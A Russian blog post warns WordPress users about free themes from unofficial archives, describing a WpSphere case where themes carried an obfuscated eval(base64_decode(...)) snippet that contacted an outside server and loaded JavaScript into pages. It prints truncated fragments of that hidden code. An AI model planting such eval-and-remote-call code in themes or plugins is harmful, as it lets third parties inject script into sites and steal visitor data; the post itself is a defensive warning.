Pull to refresh

Осторожно! Злая тема… для WordPress!

Чулан
Вдогонку к предыдущему посту о темах, взгляд с другой стороны, а если быть точным, то пост для тех самых пользователей, которые все эти темы качают.

Вообще, в последнее время очень сильно повысилось количество постов о взломе разных блогов на WordPress'е, а всё потому, что люди забывают обновляться до последней версии. Но даже наличие последней стабильной версии с офф.сайта не даёт гарантий, что вас не «поимеют».
Недавно на глаза попался пост о интересном способе, который применяют хакеры для получения информации о сайте.

Для тех, кто не очень дружит с ангельским языком, расскажу вкратце о чём там речь:
Некий дизайнер Derek Punsalan сделал темку (а точнее даже несколько) для WordPress и решил их подарить всему миру. В итоге она разлетелась по куче разных тематических архивов, одним из которых был WpSphere. И что вы думаете?

После скачивания и установки с этого сайта, некоторые пользователи заметили, что в тексте страниц находится примерно такой код
@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\...

Если вы не разбирается в PHP, поясню — такой метод применяется, чтобы скрыть реальный исполняемый код, потому что после декодирования (функция, base64_decode), текст будет выглядеть несколько более подозрительно
if($R37C014DAE5FE4FE5C77B6735ABC30916 =
@fsockopen(«www.wpssr.com», 80,
$R32D00070D4FFBCCE2FC669BBA812D4C2,
$R5F525F5B398DADD7CF0784BD406298E3, 3))
$R50F5F9C80F12FFAE8B2400528E81B34E = «wpssr»;...

В результате выполнения этого скрипта, с одного из серверов (я указал лишь часть исходника) подгружался java-script. По словам одного из блоггеров, Пола Кэрола, который проводил исследования по поводу «вредоносности» данного кода, выходит, что ничего плохого не происходило, а Wp-Sphere просто мониторили количество установок тем.

Только вот, несмотря на это, что-то уж через чур большая дыра в безопасности получается, ведь внедряя ява-скрипт на страницу, злоумышленники могут без проблем крутить рекламу, а что более скверно — получить информацию, сохраненную в браузере.
Весь этот пост написан для того, чтобы вы задумались перед установкой очередной темы, скаченой из не проверенных источников. Или, во всяком случае, проверили, что там у неё внутри, а если не можете сами (по причине, что любой код для вас — набор бессмысленных знаков), то попросите того, кто понимает, можно и меня.
И напоследок, к проверенным источникам с лёгкостью могу отнести сайт themes.wordpress.net, ибо официальный, а так же советую ознакомиться с «Кратким руководством по безопасности WordPress» от Максима, скоро постараюсь опубликовать не краткое, а большое и разностороннее.
Мира вам и безопасного интернета и WordPress.

Оригинал статьи «Осторожно! Злая тема… для WordPress!»
Tags:blogginghackhackingsecuritytemplatethemesбезопасность
Hubs: Чулан
Total votes 11: ↑10 and ↓1 +9
Views275

Popular right now